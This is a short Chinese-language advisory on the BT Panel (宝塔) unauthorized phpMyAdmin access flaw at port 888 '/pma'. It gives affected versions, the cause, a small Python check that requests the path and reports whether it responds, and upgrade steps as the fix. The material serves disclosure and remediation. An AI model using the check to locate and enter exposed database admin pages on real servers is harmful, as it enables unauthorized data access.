宝塔后门-数据库未授权访问漏洞

宝塔后门-数据库未授权访问漏洞

影响版本

  • 宝塔Linux版本 7.4.2版本

  • 宝塔Linux测试版本 7.5.14版本

  • 宝塔Windows版 6.8版本

漏洞描述

攻击者可以直接通过访问 http://网站IP:888/pma的方式。直接登录数据库后台管理页面。

宝塔是默认安装phpMyAdmin(数据库管理后台)并开启了888端口。而 phpMyAdmin 没有验证用户是否;拥有访问数据库的权限,就直接对用户放行所造成的漏洞。

漏洞原理

如果传入了username和password的情况下,宝塔会改写phpmyadmin的配置文件config.inc.php,将认证方式改成config,并写死账号密码。

poc

import requests
 
domain = 'url'
payload = ':888/pma'
url = domain+payload
 
response = requests.get(url)
if response.status_code == 200:
    print("漏洞存在!")
else:
    print("可能不存在")

exploit

修复建议

  1. 升级到宝塔最新版

  2. 关闭888端口

离线升级步骤:

  1. 下载离线升级包:http://download.bt.cn/install/update/LinuxPanel-7.4.3.zip
  2. 将升级包上传到服务器中的/root目录
  3. 解压文件:unzip LinuxPanel-7.4.3.zip
  4. 切换到升级包目录:cd panel
  5. 执行升级脚本:bash update.sh
  6. 删除升级包:cd .. && rm -f LinuxPanel-7.4.3.zip && rm -rf panel